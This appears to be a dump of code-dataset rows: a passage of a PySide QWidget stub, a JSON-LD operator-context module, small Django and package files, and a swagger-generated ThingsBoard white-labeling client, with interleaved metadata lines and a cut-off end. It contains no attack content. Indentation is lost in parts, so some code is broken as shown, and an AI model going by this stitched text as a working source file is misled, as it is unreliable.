def contentsRect(self, *args, **kwargs): # real signature unknown
pass
def contextMenuEvent(self, *args, **kwargs): # real signature unknown
pass
def contextMenuPolicy(self, *args, **kwargs): # real signature unknown
pass
def createWinId(self, *args, **kwargs): # real signature unknown
pass
def cursor(self, *args, **kwargs): # real signature unknown
pass
def customContextMenuRequested(self, *args, **kwargs): # real signature unknown
""" Signal """
pass
def destroy(self, *args, **kwargs): # real signature unknown
pass
def devType(self, *args, **kwargs): # real signature unknown
pass
def dragEnterEvent(self, *args, **kwargs): # real signature unknown
pass
def dragLeaveEvent(self, *args, **kwargs): # real signature unknown
pass
def dragMoveEvent(self, *args, **kwargs): # real signature unknown
pass
def dropEvent(self, *args, **kwargs): # real signature unknown
pass
def effectiveWinId(self, *args, **kwargs): # real signature unknown
pass
def ensurePolished(self, *args, **kwargs): # real signature unknown
pass
def enterEvent(self, *args, **kwargs): # real signature unknown
pass
def event(self, *args, **kwargs): # real signature unknown
pass
def focusInEvent(self, *args, **kwargs): # real signature unknown
pass
def focusNextChild(self, *args, **kwargs): # real signature unknown
pass
def focusNextPrevChild(self, *args, **kwargs): # real signature unknown
pass
def focusOutEvent(self, *args, **kwargs): # real signature unknown
pass
def focusPolicy(self, *args, **kwargs): # real signature unknown
pass
def focusPreviousChild(self, *args, **kwargs): # real signature unknown
pass
def focusProxy(self, *args, **kwargs): # real signature unknown
pass
def focusWidget(self, *args, **kwargs): # real signature unknown
pass
def font(self, *args, **kwargs): # real signature unknown
pass
def fontInfo(self, *args, **kwargs): # real signature unknown
pass
def fontMetrics(self, *args, **kwargs): # real signature unknown
pass
def foregroundRole(self, *args, **kwargs): # real signature unknown
pass
def frameGeometry(self, *args, **kwargs): # real signature unknown
pass
def frameSize(self, *args, **kwargs): # real signature unknown
pass
def geometry(self, *args, **kwargs): # real signature unknown
pass
def getContentsMargins(self, *args, **kwargs): # real signature unknown
pass
def grabGesture(self, *args, **kwargs): # real signature unknown
pass
def grabKeyboard(self, *args, **kwargs): # real signature unknown
pass
def grabMouse(self, *args, **kwargs): # real signature unknown
pass
def grabShortcut(self, *args, **kwargs): # real signature unknown
pass
def graphicsEffect(self, *args, **kwargs): # real signature unknown
pass
def graphicsProxyWidget(self, *args, **kwargs): # real signature unknown
pass
def hasFocus(self, *args, **kwargs): # real signature unknown
pass
def hasMouseTracking(self, *args, **kwargs): # real signature unknown
pass
def height(self, *args, **kwargs): # real signature unknown
pass
def heightForWidth(self, *args, **kwargs): # real signature unknown
pass
def hide(self, *args, **kwargs): # real signature unknown
pass
def hideEvent(self, *args, **kwargs): # real signature unknown
pass
def inputContext(self, *args, **kwargs): # real signature unknown
pass
def inputMethodEvent(self, *args, **kwargs): # real signature unknown
pass
def inputMethodHints(self, *args, **kwargs): # real signature unknown
pass
def inputMethodQuery(self, *args, **kwargs): # real signature unknown
pass
def insertAction(self, *args, **kwargs): # real signature unknown
pass
def insertActions(self, *args, **kwargs): # real signature unknown
pass
def isActiveWindow(self, *args, **kwargs): # real signature unknown
pass
def isAncestorOf(self, *args, **kwargs): # real signature unknown
pass
def isEnabled(self, *args, **kwargs): # real signature unknown
pass
def isEnabledTo(self, *args, **kwargs): # real signature unknown
pass
def isFullScreen(self, *args, **kwargs): # real signature unknown
pass
def isHidden(self, *args, **kwargs): # real signature unknown
pass
def isLeftToRight(self, *args, **kwargs): # real signature unknown
pass
def isMaximized(self, *args, **kwargs): # real signature unknown
pass
def isMinimized(self, *args, **kwargs): # real signature unknown
pass
def isModal(self, *args, **kwargs): # real signature unknown
pass
def isRightToLeft(self, *args, **kwargs): # real signature unknown
pass
def isVisible(self, *args, **kwargs): # real signature unknown
pass
def isVisibleTo(self, *args, **kwargs): # real signature unknown
pass
def isWindow(self, *args, **kwargs): # real signature unknown
pass
def isWindowModified(self, *args, **kwargs): # real signature unknown
pass
def keyboardGrabber(self, *args, **kwargs): # real signature unknown
pass
def keyPressEvent(self, *args, **kwargs): # real signature unknown
pass
def keyReleaseEvent(self, *args, **kwargs): # real signature unknown
pass
def languageChange(self, *args, **kwargs): # real signature unknown
pass
def layout(self, *args, **kwargs): # real signature unknown
pass
def layoutDirection(self, *args, **kwargs): # real signature unknown
pass
def leaveEvent(self, *args, **kwargs): # real signature unknown
pass
def locale(self, *args, **kwargs): # real signature unknown
pass
def lower(self, *args, **kwargs): # real signature unknown
pass
def mapFrom(self, *args, **kwargs): # real signature unknown
pass
def mapFromGlobal(self, *args, **kwargs): # real signature unknown
pass
def mapFromParent(self, *args, **kwargs): # real signature unknown
pass
def mapTo(self, *args, **kwargs): # real signature unknown
pass
def mapToGlobal(self, *args, **kwargs): # real signature unknown
pass
def mapToParent(self, *args, **kwargs): # real signature unknown
pass
def mask(self, *args, **kwargs): # real signature unknown
pass
def maximumHeight(self, *args, **kwargs): # real signature unknown
pass
def maximumSize(self, *args, **kwargs): # real signature unknown
pass
def maximumWidth(self, *args, **kwargs): # real signature unknown
pass
def metric(self, *args, **kwargs): # real signature unknown
pass
def minimumHeight(self, *args, **kwargs): # real signature unknown
pass
def minimumSize(self, *args, **kwargs): # real signature unknown
pass
def minimumSizeHint(self, *args, **kwargs): # real signature unknown
pass
def minimumWidth(self, *args, **kwargs): # real signature unknown
pass
def mouseDoubleClickEvent(self, *args, **kwargs): # real signature unknown
pass
def mouseGrabber(self, *args, **kwargs): # real signature unknown
pass
def mouseMoveEvent(self, *args, **kwargs): # real signature unknown
pass
def mousePressEvent(self, *args, **kwargs): # real signature unknown
pass
def mouseReleaseEvent(self, *args, **kwargs): # real signature unknown
pass
def move(self, *args, **kwargs): # real signature unknown
pass
def moveEvent(self, *args, **kwargs): # real signature unknown
pass
def nativeParentWidget(self, *args, **kwargs): # real signature unknown
pass
def nextInFocusChain(self, *args, **kwargs): # real signature unknown
pass
def normalGeometry(self, *args, **kwargs): # real signature unknown
pass
def overrideWindowFlags(self, *args, **kwargs): # real signature unknown
pass
def overrideWindowState(self, *args, **kwargs): # real signature unknown
pass
def paintEngine(self, *args, **kwargs): # real signature unknown
pass
def paintEvent(self, *args, **kwargs): # real signature unknown
pass
def palette(self, *args, **kwargs): # real signature unknown
pass
def parentWidget(self, *args, **kwargs): # real signature unknown
pass
def pos(self, *args, **kwargs): # real signature unknown
pass
def previousInFocusChain(self, *args, **kwargs): # real signature unknown
pass
def raise_(self, *args, **kwargs): # real signature unknown
pass
def rect(self, *args, **kwargs): # real signature unknown
pass
def releaseKeyboard(self, *args, **kwargs): # real signature unknown
pass
def releaseMouse(self, *args, **kwargs): # real signature unknown
pass
def releaseShortcut(self, *args, **kwargs): # real signature unknown
pass
def removeAction(self, *args, **kwargs): # real signature unknown
pass
def render(self, *args, **kwargs): # real signature unknown
pass
def repaint(self, *args, **kwargs): # real signature unknown
pass
def resetInputContext(self, *args, **kwargs): # real signature unknown
pass
def resize(self, *args, **kwargs): # real signature unknown
pass
def resizeEvent(self, *args, **kwargs): # real signature unknown
pass
def restoreGeometry(self, *args, **kwargs): # real signature unknown
pass
def saveGeometry(self, *args, **kwargs): # real signature unknown
pass
def scroll(self, *args, **kwargs): # real signature unknown
pass
def setAcceptDrops(self, *args, **kwargs): # real signature unknown
pass
def setAccessibleDescription(self, *args, **kwargs): # real signature unknown
pass
def setAccessibleName(self, *args, **kwargs): # real signature unknown
pass
def setAttribute(self, *args, **kwargs): # real signature unknown
pass
def setAutoFillBackground(self, *args, **kwargs): # real signature unknown
pass
def setBackgroundRole(self, *args, **kwargs): # real signature unknown
pass
def setBaseSize(self, *args, **kwargs): # real signature unknown
pass
def setContentsMargins(self, *args, **kwargs): # real signature unknown
pass
def setContextMenuPolicy(self, *args, **kwargs): # real signature unknown
pass
def setCursor(self, *args, **kwargs): # real signature unknown
pass
def setDisabled(self, *args, **kwargs): # real signature unknown
pass
def setEnabled(self, *args, **kwargs): # real signature unknown
pass
def setFixedHeight(self, *args, **kwargs): # real signature unknown
pass
def setFixedSize(self, *args, **kwargs): # real signature unknown
pass
def setFixedWidth(self, *args, **kwargs): # real signature unknown
pass
def setFocus(self, *args, **kwargs): # real signature unknown
pass
def setFocusPolicy(self, *args, **kwargs): # real signature unknown
pass
def setFocusProxy(self, *args, **kwargs): # real signature unknown
pass
def setFont(self, *args, **kwargs): # real signature unknown
pass
def setForegroundRole(self, *args, **kwargs): # real signature unknown
pass
def setGeometry(self, *args, **kwargs): # real signature unknown
pass
def setGraphicsEffect(self, *args, **kwargs): # real signature unknown
pass
def setHidden(self, *args, **kwargs): # real signature unknown
pass
def setInputContext(self, *args, **kwargs): # real signature unknown
pass
def setInputMethodHints(self, *args, **kwargs): # real signature unknown
pass
def setLayout(self, *args, **kwargs): # real signature unknown
pass
def setLayoutDirection(self, *args, **kwargs): # real signature unknown
pass
def setLocale(self, *args, **kwargs): # real signature unknown
pass
def setMask(self, *args, **kwargs): # real signature unknown
pass
def setMaximumHeight(self, *args, **kwargs): # real signature unknown
pass
def setMaximumSize(self, *args, **kwargs): # real signature unknown
pass
def setMaximumWidth(self, *args, **kwargs): # real signature unknown
pass
def setMinimumHeight(self, *args, **kwargs): # real signature unknown
pass
def setMinimumSize(self, *args, **kwargs): # real signature unknown
pass
def setMinimumWidth(self, *args, **kwargs): # real signature unknown
pass
def setMouseTracking(self, *args, **kwargs): # real signature unknown
pass
def setPalette(self, *args, **kwargs): # real signature unknown
pass
def setParent(self, *args, **kwargs): # real signature unknown
pass
def setShortcutAutoRepeat(self, *args, **kwargs): # real signature unknown
pass
def setShortcutEnabled(self, *args, **kwargs): # real signature unknown
pass
def setSizeIncrement(self, *args, **kwargs): # real signature unknown
pass
def setSizePolicy(self, *args, **kwargs): # real signature unknown
pass
def setStatusTip(self, *args, **kwargs): # real signature unknown
pass
def setStyle(self, *args, **kwargs): # real signature unknown
pass
def setStyleSheet(self, *args, **kwargs): # real signature unknown
pass
def setTabOrder(self, *args, **kwargs): # real signature unknown
pass
def setToolTip(self, *args, **kwargs): # real signature unknown
pass
def setUpdatesEnabled(self, *args, **kwargs): # real signature unknown
pass
def setVisible(self, *args, **kwargs): # real signature unknown
pass
def setWhatsThis(self, *args, **kwargs): # real signature unknown
pass
def setWindowFilePath(self, *args, **kwargs): # real signature unknown
pass
def setWindowFlags(self, *args, **kwargs): # real signature unknown
pass
def setWindowIcon(self, *args, **kwargs): # real signature unknown
pass
def setWindowIconText(self, *args, **kwargs): # real signature unknown
pass
def setWindowModality(self, *args, **kwargs): # real signature unknown
pass
def setWindowModified(self, *args, **kwargs): # real signature unknown
pass
def setWindowOpacity(self, *args, **kwargs): # real signature unknown
pass
def setWindowRole(self, *args, **kwargs): # real signature unknown
pass
def setWindowState(self, *args, **kwargs): # real signature unknown
pass
def setWindowTitle(self, *args, **kwargs): # real signature unknown
pass
def show(self, *args, **kwargs): # real signature unknown
pass
def showEvent(self, *args, **kwargs): # real signature unknown
pass
def showFullScreen(self, *args, **kwargs): # real signature unknown
pass
def showMaximized(self, *args, **kwargs): # real signature unknown
pass
def showMinimized(self, *args, **kwargs): # real signature unknown
pass
def showNormal(self, *args, **kwargs): # real signature unknown
pass
def size(self, *args, **kwargs): # real signature unknown
pass
def sizeHint(self, *args, **kwargs): # real signature unknown
pass
def sizeIncrement(self, *args, **kwargs): # real signature unknown
pass
def sizePolicy(self, *args, **kwargs): # real signature unknown
pass
def stackUnder(self, *args, **kwargs): # real signature unknown
pass
def statusTip(self, *args, **kwargs): # real signature unknown
pass
def style(self, *args, **kwargs): # real signature unknown
pass
def styleSheet(self, *args, **kwargs): # real signature unknown
pass
def tabletEvent(self, *args, **kwargs): # real signature unknown
pass
def testAttribute(self, *args, **kwargs): # real signature unknown
pass
def toolTip(self, *args, **kwargs): # real signature unknown
pass
def underMouse(self, *args, **kwargs): # real signature unknown
pass
def ungrabGesture(self, *args, **kwargs): # real signature unknown
pass
def unsetCursor(self, *args, **kwargs): # real signature unknown
pass
def unsetLayoutDirection(self, *args, **kwargs): # real signature unknown
pass
def unsetLocale(self, *args, **kwargs): # real signature unknown
pass
def update(self, *args, **kwargs): # real signature unknown
pass
def updateGeometry(self, *args, **kwargs): # real signature unknown
pass
def updateMicroFocus(self, *args, **kwargs): # real signature unknown
pass
def updatesEnabled(self, *args, **kwargs): # real signature unknown
pass
def visibleRegion(self, *args, **kwargs): # real signature unknown
pass
def whatsThis(self, *args, **kwargs): # real signature unknown
pass
def wheelEvent(self, *args, **kwargs): # real signature unknown
pass
def width(self, *args, **kwargs): # real signature unknown
pass
def window(self, *args, **kwargs): # real signature unknown
pass
def windowFilePath(self, *args, **kwargs): # real signature unknown
pass
def windowFlags(self, *args, **kwargs): # real signature unknown
pass
def windowIcon(self, *args, **kwargs): # real signature unknown
pass
def windowIconText(self, *args, **kwargs): # real signature unknown
pass
def windowModality(self, *args, **kwargs): # real signature unknown
pass
def windowOpacity(self, *args, **kwargs): # real signature unknown
pass
def windowRole(self, *args, **kwargs): # real signature unknown
pass
def windowState(self, *args, **kwargs): # real signature unknown
pass
def windowTitle(self, *args, **kwargs): # real signature unknown
pass
def windowType(self, *args, **kwargs): # real signature unknown
pass
def winEvent(self, *args, **kwargs): # real signature unknown
pass
def winId(self, *args, **kwargs): # real signature unknown
pass
def x(self, *args, **kwargs): # real signature unknown
pass
def y(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
DrawChildren = PySide.QtGui.QWidget.RenderFlag.DrawChildren
DrawWindowBackground = PySide.QtGui.QWidget.RenderFlag.DrawWindowBackground
IgnoreMask = PySide.QtGui.QWidget.RenderFlag.IgnoreMask
RenderFlag = None # (!) real value is "<type 'PySide.QtGui.QWidget.RenderFlag'>"
RenderFlags = None # (!) real value is "<type 'RenderFlags'>"
staticMetaObject = None # (!) real value is '<PySide.QtCore.QMetaObject object at 0x0000000003F9F348>'
| 28.182171
| 106
| 0.634438
| 2,352
| 21,813
| 5.871599
| 0.132228
| 0.234395
| 0.360608
| 0.323244
| 0.738306
| 0.735554
| 0.733092
| 0.73034
| 0
| 0
| 0
| 0.00136
| 0.258332
| 21,813
| 773
| 107
| 28.218629
| 0.852269
| 0.281988
| 0
| 0.489195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.489195
| false
| 0.489195
| 0.005894
| 0
| 0.508841
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 9
|
62426300f28b8c6a0c9bd02a4c411708a3f324bd
| 3,826
|
py
|
Python
|
expression_interface/contexts.py
|
IDEHCO3/kanban-backend
|
902732f0fd569627925356d6b9d68a5ec7680b88
|
[
"MIT"
] | null | null | null |
expression_interface/contexts.py
|
IDEHCO3/kanban-backend
|
902732f0fd569627925356d6b9d68a5ec7680b88
|
[
"MIT"
] | null | null | null |
expression_interface/contexts.py
|
IDEHCO3/kanban-backend
|
902732f0fd569627925356d6b9d68a5ec7680b88
|
[
"MIT"
] | null | null | null |
from hyper_resource.contexts import ContextResource
class SubBooleanOperatorResourceContext(ContextResource):
    """Builds the JSON-LD context document for sub-boolean (comparison) operators."""

    def attributes_contextualized_dict(self):
        """Return the JSON-LD '@context' term map for every supported operator token.

        Each key maps to ``{'@id': uri, '@type': uri}``.  Keys prefixed with
        ``*`` are alternate spellings of the same operator.

        Fix: the starred is-not-null key was misspelled ``"*inotsnull"``; it is
        now ``"*isnotnull"``, matching the unstarred form and every other
        operator's starred/unstarred pairing.
        """
        def term(uri):
            # JSON-LD term definition: same URI for both @id and @type.
            return {'@id': uri, '@type': uri}

        # NOTE(review): single-slash "http:/" scheme kept verbatim from the
        # original data — confirm whether "http://" was intended.
        in_uri = "http:/interfaces/in"
        equal = "http://schema.org/equal"
        non_equal = "http://schema.org/nonEqual"
        lesser = "http://schema.org/lesser"
        lesser_or_equal = "http://schema.org/lesserOrEqual"
        greater = "http://schema.org/greater"
        greater_or_equal = "http://schema.org/greaterOrEqual"

        dic_context = {}
        # in / isnull / isnotnull / between all share the generic 'in' URI.
        for op in ("in", "*in", "isnull", "*isnull",
                   "isnotnull", "*isnotnull", "between", "*between"):
            dic_context[op] = term(in_uri)
        for op in ("eq", "*eq"):
            dic_context[op] = term(equal)
        # '*noeq' kept for backward compatibility alongside the usual '*neq'.
        for op in ("neq", "*neq", "*noeq"):
            dic_context[op] = term(non_equal)
        for op in ("lt", "*lt"):
            dic_context[op] = term(lesser)
        for op in ("lte", "*lte"):
            dic_context[op] = term(lesser_or_equal)
        for op in ("gt", "*gt"):
            dic_context[op] = term(greater)
        for op in ("gte", "*gte"):
            dic_context[op] = term(greater_or_equal)
        return dic_context

    def context(self):
        """Assemble and cache the full context document on ``self.dict_context``."""
        self.dict_context = {
            "@context": self.attributes_contextualized_dict(),
            # NOTE(review): doubled scheme "http://http:/" kept verbatim — confirm.
            "@id": "http://http:/interfaces/SubBooleanOperators",
            "@type": "SubBooleanOperators",
        }
        return self.dict_context
class LogicalOperatorResourceContext(ContextResource):
    """Builds the JSON-LD context document for the logical operators (and / or)."""

    def attributes_contextualized_dict(self):
        """Return the JSON-LD term map for 'or'/'and' plus their '*'-prefixed forms."""
        base = "http:/interfaces/"
        return {
            prefix + op: {'@id': base + op, '@type': base + op}
            for op in ("or", "and")
            for prefix in ("", "*")
        }

    def context(self):
        """Assemble and cache the full context document on ``self.dict_context``."""
        self.dict_context = {
            "@context": self.attributes_contextualized_dict(),
            "@id": "http://http:/interfaces/LogicalOperators",
            "@type": "LogicalOperator",
        }
        return self.dict_context
| 64.847458
| 133
| 0.490068
| 345
| 3,826
| 5.368116
| 0.133333
| 0.087473
| 0.182505
| 0.105292
| 0.843413
| 0.843413
| 0.843413
| 0.843413
| 0.758099
| 0.645788
| 0
| 0
| 0.302927
| 3,826
| 58
| 134
| 65.965517
| 0.694413
| 0
| 0
| 0.291667
| 0
| 0
| 0.420805
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.020833
| 0
| 0.229167
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6245fb956bb988793c9c619281a9786f252bb9a9
| 66
|
py
|
Python
|
rafft/__init__.py
|
strevol-mpi-mis/RAFFT
|
4ff1820ffec6f3d826861c6d06d2dc02834f3c41
|
[
"MIT"
] | 1
|
2021-07-05T11:46:20.000Z
|
2021-07-05T11:46:20.000Z
|
rafft/__init__.py
|
strevol-mpi-mis/RAFFT
|
4ff1820ffec6f3d826861c6d06d2dc02834f3c41
|
[
"MIT"
] | null | null | null |
rafft/__init__.py
|
strevol-mpi-mis/RAFFT
|
4ff1820ffec6f3d826861c6d06d2dc02834f3c41
|
[
"MIT"
] | null | null | null |
from rafft.rafft import fold
from rafft.rafft_kin import kinetics
| 22
| 36
| 0.848485
| 11
| 66
| 5
| 0.545455
| 0.327273
| 0.509091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 66
| 2
| 37
| 33
| 0.948276
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
625b3909194bf185be27d0762074cf8ccb51cc3c
| 134
|
py
|
Python
|
tukey/context_processors.py
|
Li-Ko/tukey_portal
|
8dc395ef1a1ebaa806d23c88ce51460e6c202921
|
[
"Apache-2.0"
] | null | null | null |
tukey/context_processors.py
|
Li-Ko/tukey_portal
|
8dc395ef1a1ebaa806d23c88ce51460e6c202921
|
[
"Apache-2.0"
] | null | null | null |
tukey/context_processors.py
|
Li-Ko/tukey_portal
|
8dc395ef1a1ebaa806d23c88ce51460e6c202921
|
[
"Apache-2.0"
] | null | null | null |
from django.conf import settings # import the settings file
def logout_url(context):
    """Django context processor: expose ``settings.LOGOUT_URL`` to templates."""
    url = settings.LOGOUT_URL
    return {'LOGOUT_URL': url}
| 22.333333
| 59
| 0.768657
| 19
| 134
| 5.263158
| 0.631579
| 0.27
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.149254
| 134
| 5
| 60
| 26.8
| 0.877193
| 0.179104
| 0
| 0
| 0
| 0
| 0.092593
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
625dfba36e617e1a8918fce9de0e751f7164c5e8
| 60
|
py
|
Python
|
musicmood/musicmood.py
|
BornFreeLabs/moodmusic
|
89a4ff4398d3a7c42e106befa76165ee2c151af4
|
[
"Apache-2.0"
] | null | null | null |
musicmood/musicmood.py
|
BornFreeLabs/moodmusic
|
89a4ff4398d3a7c42e106befa76165ee2c151af4
|
[
"Apache-2.0"
] | null | null | null |
musicmood/musicmood.py
|
BornFreeLabs/moodmusic
|
89a4ff4398d3a7c42e106befa76165ee2c151af4
|
[
"Apache-2.0"
] | 1
|
2017-08-04T04:29:07.000Z
|
2017-08-04T04:29:07.000Z
|
def test():
    """Smoke-test hook: print a confirmation that the module was imported.

    Returns None; the message goes to stdout.
    """
    # Fixed typo in the message: "succesfully" -> "successfully".
    print("musicmood module imported successfully")
| 20
| 47
| 0.766667
| 7
| 60
| 6.571429
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116667
| 60
| 2
| 48
| 30
| 0.867925
| 0
| 0
| 0
| 0
| 0
| 0.616667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0.5
| 0
| 1
| 0.5
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
654fb879e541dc0de97bd611c9feffc0c0d6e01e
| 41,020
|
py
|
Python
|
tb_rest_client/api/api_pe/white_labeling_controller_api.py
|
maksonlee/python_tb_rest_client
|
a6cd17ef4de31f68c3226b7a9835292fbac4b1fa
|
[
"Apache-2.0"
] | 1
|
2021-07-19T10:09:04.000Z
|
2021-07-19T10:09:04.000Z
|
tb_rest_client/api/api_pe/white_labeling_controller_api.py
|
moravcik94/python_tb_rest_client
|
985361890cdf4ccce93d2b24905ad9003c8dfcaa
|
[
"Apache-2.0"
] | null | null | null |
tb_rest_client/api/api_pe/white_labeling_controller_api.py
|
moravcik94/python_tb_rest_client
|
985361890cdf4ccce93d2b24905ad9003c8dfcaa
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
# Copyright 2020. ThingsBoard
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api_client import ApiClient
class WhiteLabelingControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def get_app_theme_css_using_post(self, palette_settings, **kwargs): # noqa: E501
"""getAppThemeCss # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_app_theme_css_using_post(palette_settings, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PaletteSettings palette_settings: paletteSettings (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_app_theme_css_using_post_with_http_info(palette_settings, **kwargs) # noqa: E501
else:
(data) = self.get_app_theme_css_using_post_with_http_info(palette_settings, **kwargs) # noqa: E501
return data
def get_app_theme_css_using_post_with_http_info(self, palette_settings, **kwargs): # noqa: E501
    """getAppThemeCss # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api_pe.get_app_theme_css_using_post_with_http_info(palette_settings, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param PaletteSettings palette_settings: paletteSettings (required)
    :return: str
    If the method is called asynchronously,
    returns the request thread.
    """
    # NOTE: swagger-codegen generated; manual edits are lost on regeneration.
    all_params = ['palette_settings'] # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Generated pattern: fold **kwargs into the flat dict captured by locals().
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'palette_settings' is set
    if ('palette_settings' not in params or
            params['palette_settings'] is None):
        raise ValueError("Missing the required parameter `palette_settings` when calling `get_app_theme_css_using_post`") # noqa: E501
    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    if 'palette_settings' in params:
        body_params = params['palette_settings']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['plain/text']) # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
        ['application/json']) # noqa: E501
    # Authentication setting
    auth_settings = ['X-Authorization'] # noqa: E501
    return self.api_client.call_api(
        '/api/whiteLabel/appThemeCss', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='str', # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_current_login_white_label_params_using_get(self, **kwargs): # noqa: E501
"""getCurrentLoginWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_current_login_white_label_params_using_get(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: LoginWhiteLabelingParams
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_current_login_white_label_params_using_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_current_login_white_label_params_using_get_with_http_info(**kwargs) # noqa: E501
return data
def get_current_login_white_label_params_using_get_with_http_info(self, **kwargs): # noqa: E501
    """getCurrentLoginWhiteLabelParams # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api_pe.get_current_login_white_label_params_using_get_with_http_info(async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :return: LoginWhiteLabelingParams
    If the method is called asynchronously,
    returns the request thread.
    """
    # NOTE: swagger-codegen generated; manual edits are lost on regeneration.
    all_params = [] # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # Generated pattern: fold **kwargs into the flat dict captured by locals().
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        params[key] = val
    del params['kwargs']
    collection_formats = {}
    path_params = {}
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json']) # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
        ['application/json']) # noqa: E501
    # Authentication setting
    auth_settings = ['X-Authorization'] # noqa: E501
    return self.api_client.call_api(
        '/api/whiteLabel/currentLoginWhiteLabelParams', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='LoginWhiteLabelingParams', # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_current_white_label_params_using_get(self, **kwargs): # noqa: E501
"""getCurrentWhiteLabelParams # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_current_white_label_params_using_get(async_req=True)
